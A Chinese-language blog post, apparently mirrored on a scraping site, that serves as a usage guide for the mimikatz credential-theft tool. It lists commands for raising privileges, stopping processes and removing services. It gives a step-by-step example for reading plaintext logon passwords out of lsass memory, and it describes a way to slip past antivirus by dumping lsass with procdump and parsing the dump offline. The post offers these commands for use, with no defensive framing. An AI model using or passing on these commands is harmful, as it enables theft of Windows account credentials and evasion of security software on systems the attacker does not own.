zoukankan      html  css  js  c++  java
  • mimikatz使用

    一.简介

    mimikatz是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点也是让阿刚最感兴趣的就是他可以直接从 lsass中获取当前处于Active系统的登录密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而mimikatz正是通过对lsass的逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!

    二.常用命令

    • cls-----------------------------清屏
    • exit----------------------------退出
    • version------------查看mimikatz的版本
    • system::user-----查看当前登录的系统用户
    • system::computer-------查看计算机名称
    • process::list------------------列出进程
    • process::suspend 进程名称 -----暂停进程
    • process::stop 进程名称---------结束进程
    • process::modules --列出系统的核心模块及所在位置
    • service::list---------------列出系统的服务
    • service::remove-----------移除系统的服务
    • service::start stop 服务名称--启动或停止服务
    • privilege::list---------------列出权限列表
    • privilege::enable--------激活一个或多个权限
    • privilege::debug-----------------提升权限
    • nogpo::cmd------------打开系统的cmd.exe
    • nogpo::regedit -----------打开系统的注册表
    • nogpo::taskmgr-------------打开任务管理器
    • ts::sessions-----------------显示当前的会话
    • ts::processes------显示进程和对应的pid情况等
    • sekurlsa::wdigest-----获取本地用户信息及密码
    • sekurlsa::tspkg------获取tspkg用户信息及密码
    • sekurlsa::logonPasswords--获登陆用户信息及密码

    三.使用举例

    1.privilege::debug  (提升权限,工具一定要用管理员权限打开,不是管理员的应该先提权)

    2.sekurlsa::logonpasswords(获取密码)

    四.绕过杀软执行mimikatz的一种方式------导出lsass进程离线读密码

    用procdump64或者直接在任务管理器中将lsass文件转存为dmp文件。

    procdump64执行的命令:procdump64.exe-accepteula-malsass.exe 1.dmp

    然后将文件下载到本地在运行mimikatz。

    mimikatz_2.exe "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit

  • 相关阅读:
    docker vm 性能优劣
    Jeecg-Boot Spring Boot
    MyBatis-Plus
    Eclipse lombok java
    MySQL 高可用性—keepalived+mysql双主
    如何使用 Docker 来限制 CPU、内存和 IO等资源?
    Requires: libc.so.6(GLIBC_2.14)(64bit)
    项目管理、软件、禅道 VS JIRA
    解决Window安全中心对Kitematic-0.17.3-Ubuntu.zip提示病毒,但无法删除的问题。
    正则表达式 贪婪模式
  • 原文地址:https://www.cnblogs.com/yonghegn/p/10028104.html
Copyright © 2011-2022 走看看